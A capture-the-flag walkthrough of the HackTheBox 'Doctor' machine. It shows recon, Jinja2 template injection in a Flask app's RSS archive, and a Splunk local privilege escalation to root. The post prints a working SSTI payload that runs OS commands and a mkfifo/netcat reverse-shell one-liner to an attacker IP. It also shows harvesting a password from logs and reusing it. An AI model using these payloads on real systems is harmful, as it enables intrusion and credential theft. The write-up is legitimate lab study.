HackTheBox - Doctor write up
4 min read

HackTheBox - Doctor write up

HackTheBox - Doctor write up

Doctor is a Linux Easy box.

Recon

As always, let's start with a nmap scan.

$ nmap -A -p- -oN scan.nmap 10.10.10.209

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As you can see, there is three ports open, 22, 80 and 8089 (keep in mind the last one for the end).

Web

http://10.10.10.209/index.html

I did not find any interesting things on this static website, so I try to find a valid Virtual Host via dictionary with wfuzz.

$ wfuzz -c --hh 19848 -z file,/wordlists/subdomains-top1mil-110000.txt -H "Host: FUZZ.htb" "http://10.10.10.209/"

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.209/
Total requests: 114532

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                      
=====================================================================
                                                                                                                        
000012084:   302        3 L      24 W       237 Ch      "doctors"                                                                                                                                                                    

Total time: 173.4978
Processed Requests: 12354
Filtered Requests: 12351
Requests/sec.: 71.20549

I found one VHOST (Virtual Host) that redirect us to a new website. Let's add it to my /etc/hosts file.

10.10.10.209 doctors.htb
/etc/hosts
http://doctors.htb/login?next=/home

The URL parameter ?next=/home is commonly used in Flask or Django web application. Thanks to Wappalyzer we know that the website is running under Flask, a python web framework. Maybe we can find some SSTI (Server Side Template Injection) in Jinja2 (template engine for Flask).

In the HTML source code we can find a commented anchor :

<!--archive still under beta testing<a class="nav-item nav-link" href="/archive">Archive</a>-->

The archive endpoint looks like a RSS feed. If we register an account and start posting messages, the RSS page will contains our posts title and content.

So, I try to inject Jinja2 code.

And there is the content of /archive.

<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title>Hello</title></item>

	</channel>
	<item><title>9</title></item>

	</channel>
			

		</channel>

As you can see, the title of the second post get processed, {{3*3}} became 9.

I obtain RCE (Remote Code Execution) on the web server by sending this payload.

{{config.__class__.__init__.__globals__['os'].popen('your_command_here').read()}}

It calls the popen function from the os module via Python introspection. Let's make a reverse shell !

Payload : {{config.__class__.__init__.__globals__['os'].popen('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.103 4444 >/tmp/f').read()}}

xanhacks~ $ nc -lvnp 4444
Connection from 10.10.10.209:46932
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty;pty.spawn('/bin/bash')"
web@doctor:~$ id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)

User

As you can see we are in the adm group, so we can read /var/log. Let's try to find credentials in there.

web@doctor:~$ grep -iR "password" /var/log/
...
apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
...
web@doctor:~$ su shaun
Password: Guitar123
shaun@doctor:/home/web$ id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
shaun@doctor:/home/web$ cd
shaun@doctor:~$ cat user.txt 
4c38a71940b87026...

The password Guitar123 was reused by the user shaun. We get the user.txt flag !

Root

If you remember from the recon part, the 8089 port was open. It's for Splunk, a software to search, monitor and analyze machine-generated data.

$ ps -aux | grep splunk
root        1139              splunkd -p 8089 start
...

Splunkd is running as root, interesting.

After some research, I found this exploit from github. It creates a malicious Splunk app that copy the /bin/sh binary to a tempory location and add it the SUID bit.

To talk to the splunk HTTP API, we need to be authenticated. I try with the default splunk credentials admin:changeme but I get a 401 Unauthorized. Then, I try again with shaun:Guitar123 and it works !

shaun@doctor:/tmp$ bash exploit.sh 

[!] SPLUNK LOCAL PRIVESC [!]

...

[!] If all went well run /tmp/.tester/bin/shdoor -p for a root shell
[!] Run whoami if your prompt didn't change...

[!] DELETE THE .tester DIRECTORY AS ROOT WHEN YOU'RE DONE! [!]
shaun@doctor:/tmp$ /tmp/.tester/bin/shdoor -p
# id
uid=1002(shaun) gid=1002(shaun) euid=0(root) groups=1002(shaun)
# cat /root/root.txt
b9a151f95ea3e02728d9...

Rooted !

Enjoying these posts? Subscribe for more